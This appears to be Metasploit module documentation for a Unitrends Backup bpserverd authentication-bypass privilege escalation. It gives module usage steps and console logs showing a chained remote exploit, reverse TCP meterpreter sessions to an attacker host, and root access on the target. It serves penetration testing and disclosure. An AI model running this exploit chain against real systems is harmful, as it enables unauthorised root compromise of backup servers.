## Vulnerable Application

It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`,
has an issue in which its authentication can be bypassed.  A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the
`localhost` by dropping a python script on the local file system.  Unitrends stopped
`bpserverd` from listening remotely on version 10.

## Vulnerable Application

This module has been tested successfully on:
  * UEB 9.2
  * UEB 10.0

## Verification Steps

  1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1`
  2. ```use exploit/linux/local/ueb_bpserverd_privesc ```
  3. ```set session [SESSION]```
  4. ```exploit```
  5. A root meterpreter session should have been opened successfully

## Scenarios

### UEB 10.0 on CentOS 6.5

```
msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

### UEB 9.2 on CentOS 6

```
resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

